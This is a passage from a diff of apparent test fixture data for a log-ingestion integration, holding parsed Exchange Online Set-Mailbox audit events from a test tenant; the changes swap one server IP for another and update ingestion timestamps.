(Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853303200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5109,12 +5109,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5157,7 +5157,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -5169,8 +5169,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177755800Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"f580aae6-d0d5-4204-1a13-08d7ac0f2a03\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853307100Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"f580aae6-d0d5-4204-1a13-08d7ac0f2a03\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5190,12 +5190,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5238,7 +5238,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -5250,8 +5250,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177758600Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853310500Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5271,12 +5271,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5319,7 +5319,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -5331,8 +5331,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177761400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"2db154f6-63ae-4a31-c548-08d7adfc0d1d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853315Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"2db154f6-63ae-4a31-c548-08d7adfc0d1d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5352,12 +5352,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5400,7 +5400,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -5412,8 +5412,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177764100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853320700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5433,12 +5433,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5481,7 +5481,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -5493,8 +5493,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177767Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853325700Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5514,12 +5514,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5550,7 +5550,7 @@ }, "related": { "ip": [ - "15.20.207.17" + 